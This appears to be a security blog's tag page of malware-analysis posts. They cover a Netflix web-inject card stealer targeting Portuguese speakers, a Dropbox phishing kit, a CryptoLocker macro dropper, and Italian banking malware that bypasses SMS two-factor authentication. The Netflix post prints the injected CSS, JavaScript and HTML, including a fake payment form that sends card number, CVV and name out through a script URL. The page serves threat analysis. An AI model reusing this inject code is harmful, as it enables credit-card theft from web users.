Skip to content →

Tag: malware

NETFLIX malware/phishing attack targeting Portuguese-speaking countries

Netflix is one of the most popular streaming platforms , all over the world, especially because of the “hottest” TV series. But, this popularity has attracted also criminals, looking for new ways to steal money. During the last months Netflix has been targeted by malware, written to steal credit card information and user credentials. The attack uses the same methodologies used by financial malware like Dridex/Zeus: web injects.

Once the user has been infected, the malware waits till the user loads the Netflix webpage to login. As soon as the user accesses the page and the browser loads the content from the server, the malware injects the malicious HTML, JavaScript and CSS content.

The code is activated in case of GET or POST requests on **.

set_url ** GP

where G= GET and P=POST

Once the page is loaded the malware injects the following code:

CSS code

.ontop {
z-index: 999;
width: 100%;
height: 100%;
top: 0;
left: 0;
display: none;
position: absolute;
.ontop2 {
top: 50%;
left: 50%;
margin-bottom: 0;
align-content: center;
#popup {
padding: 10px;
width: 1224px;
height: 700px;
position: absolute;
color: #fff;
top: 50%;
left: 50%;
margin-top: -400px;
margin-left: -600px;
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
font-size: 12px;
background: #000000;
#cc_form input {
width: 100%;
height: 50px;
padding: 9px;
border-radius: 2px;
border: 1px solid #999;
color: #fff;
background-color: #333;
#cc_form td {
padding-top: 10px;
color: #eee;
font-size: 12px;
#cc_submit {
text-decoration: none;
color: white;
padding-bottom: 12px;
padding-left: 28px;
padding-right: 28px;
padding-top: 12px;
text-align: center;
border-radius: 2px;
background: #ff3019;
background: -moz-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: -webkit-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: linear-gradient(to bottom, #ff3019 0%, #cf0404 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff3019', endColorstr='#cf0404', GradientType=0);
#cc_submit:hover {
background: #ff1a00;
background: -moz-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: -webkit-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: linear-gradient(to bottom, #ff1a00 0%, #ff1a00 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff1a00', endColorstr='#ff1a00', GradientType=0);
JavaScript code


function submitMe(){ 
    if (document.getElementById("cc_number").value == "") {
        alert("Ingresse um numero de Cartao");
        return false;
    }else {
        if (valid_credit_card(document.getElementById("cc_number").value)) {} 
        else {
           alert("Ingresse um numero Valido");
           return false;
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o mes de validade!");
        return false;
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o ano de validade!");
        return false;
    if (document.getElementById("cc_ccv").value == "") {
        alert("Ingresse o codigo de segurança do seu cartao!");
        return false;
    if (document.getElementById("cc_name").value == "") {
        alert("Ingresse o seu nome Completo!");
        return false;

var _link_ = "";
var _url_ = _link_ + 'CC=' + document.getElementById("cc_number").value + '&month=' + document.getElementById("cc_month").value + '&year=' + document.getElementById("cc_year").value + '&cvv=' + document.getElementById("cc_ccv").value + '&name=' + document.getElementById("cc_name").value;
var head = document.getElementsByTagName("head")[0];
var script_ = document.createElement('script');
script_.src = _url_;
script_.type = 'text/javascript';
setCookie("WeAre", "Foda", 365);

HTML code

<div class="ontop" id="popDiv">

<div id="popup">
   <img src= ""width="128">

<h4>Houve um problema com seus dados de pagamento.</h4>

Desculpe-nos por
 interromper o show, mas não foi possÌvel confirmar suas informações de
 pagamento. Mas não se preocupe! Insira os dados no campo abaixo para

<form id="cc_form" name="cc_form">

<table width="100%">


<td colspan="2">Numero do cartão: <input id="cc_number" name= "cc_number" placeholder="E.g. 0000 0000 0000 0000" type="text"></td>



<td>Validade: <input id="cc_month" name="cc_month" placeholder="MM" style="width: 45% !important;" type="text"> <input id="cc_year" name= "cc_year" placeholder="AA" style="width: 45% !important;" type= "text"></td>

<td>Codigo de segurança: <input id="cc_ccv" name="cc_ccv" placeholder="" type="text"></td>



<td colspan="2">Nome do titular (conforme escrito no cartão):
 <input id="cc_name" name="cc_name" type="text"></td>



<a href="" id="cc_submit" onclick="submitMe();">CONTINUAR</a>




In order to see how the malware interacts with the user, we can inject the code in the browser, where the Netflix login page is loaded.

The malware checks, weather the inserted credit card  has a valid number or not.screen-shot-2016-10-17-at-2-54-52-pm

Using a valid credit card is possible to submit the request, triggering the submitMe() JavaScript function (showed above).

Leave a Comment

Phishing Attack #4 – Dropbox

Clone kit revealed

A new fake Dropbox phishing scam targeting users of the online sharing and storage platform is currently in circulation. The scam invites readers to view files shared by another Dropbox user, and click on a link that redirects to a phishing website. 


However, this phishing scam tries to fool users into submitting username and password details of their email address (YAHOO, Outlook, Gmail,AOL or others)  in order to gain access their account.


Clicking on the icons a modal pops up asking for credentials.

screen-shot-2016-10-13-at-11-27-16-am screen-shot-2016-10-13-at-11-27-24-am

Once the credentials are filled and the “Submit” button is clicked, the credentials are sent through email to the phisher. 

Analyzing the web server is possible to retrieve the clone kit used by the attacker to create the phishing website. The clone kit is very simple and developed with basic programming skills. Below the structure and the source code of submit.php. “form.php” and “index.php” are 99% composed by HTML code.


The developer downloaded all the icons to avoid recon.



Dropbox can easily identify this phishing attack analyzing the HTTP referer field of the HTTP packet, because the phishing website redirects to the official dropbox website.


Leave a Comment



CryptoLocker was a ransomware trojan which targeted computers running Microsoft Windows and was first observed by Dell SecureWorks in September 2013. CryptoLocker propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware’s control servers. The malware then displays a message, which offers to decrypt the data if a payment (through either Bitcoin or a pre-paid cash voucher) is made by a stated deadline, and threatened to delete the private key if the deadline passes. If the deadline is not met, the malware offered to decrypt data via an online service provided by the malware’s operators, for a significantly higher price in Bitcoin”(Wikipedia)

Infection Process

The CryptoLocker infection process start when the Microsoft Office Word is opened. Microsoft allow users to inject a macro scripting code inside documents, and give the possibility to execute it automatically when the document is opened.

“A macro is a series of commands and actions that help to automate some tasks – effectively a program but usually quite short and simple. However they are created, they need to be executed by some system which interprets the stored commands” (Wikipedia)

Analyzing the documents we received through a suspicious mail we extract the macro inside. The macro used by hackers to infect the machine is a Visual Basic module that is able to create new files inside the TEMP folder and download the real malware from a C&C server through an HTTP GET request. To avoid antivirus detection the malware is represented by a .PNG image containing a VB code inside.

Here is a sample took from the original macro that show how the malware can communicate with his C&C server and how the code is obfuscated.


Many characters are obfuscated (xx) on purpose. The macro we found inside is a VB macro with many functions to hook the malware and download the real .exe from another server.

After the dropper executes the malware the system is encrypting the personal files with public PGP key and storing the private key in the CC server with time bomb.



Leave a Comment


During last few years banks, and different financial institutions, have been trying to protect or prevent fraud and cyber-attacks from accessing their customers’ credentials. They increased security and login factors to avoid these kind of problems. One of these is the Two Factor Authentication (2FA), used to “help” username and password to protect the bank account.

However today, this system is hackable by malicious users. Trend Micros said:

“The attack is designed to bypass a certain two-factor authentication scheme used by banks. In particular, it bypasses session tokens, which are frequently sent to users’ mobile devices via Short Message Service (SMS). Users are expected to enter a session token to activate banking sessions so they can authenticate their identities. Since this token is sent through a separate channel, this method is generally considered secure”.

This article is a real User Case of this kind of malicious software. During our recent malware analysis targeting Italian financial institutions, we found a very powerful piece of it that can bypass the 2FA with a malicious app in- stalled on the phone. Malware like this can drive the user to download the fake application on their phone from the official Google Play Store, using a Man in the browser attack (MITB). Once on the user’s PC, the attacker can take full control of the machine and interact with him through a Command and Control (C&C) server. What we explain in this article is a real active botnet with at least 40-compromised zombie hosts.


During the last few days, we are seeing criminals developing more sophisticated solutions and have increasing knowledge in mobile and web programming. This scenario is increasing throughout the en- tire world; though concentrated mostly in Europe. Criminals are developing solutions to bypass the 2FA used by the 90% of banks developing “legal” application published in the Google Play Store and Apple App Store. These applications can steal information on the phone, intercept and send it over the network silently. The last operation named “Operation Emmenthal”, discovered by Trend Micro is acting in just this way. In this section, we will discover how a criminal can force a user to download and install the mobile application.

When malware infects the machine, and the user navigates to the online banking platform, a MITB at- tack starts injecting JavaScript code inside the browser. This injection modifies some data in the page while keeping the same structure. During the navigation the hacked website will invite the user to down- load the fake application, explaining all the steps to insert their bogus data. The app can be downloaded in two different ways:

SMS (inserting your number in the fake form you will receive an SMS with the download link from the store)


Leave a Comment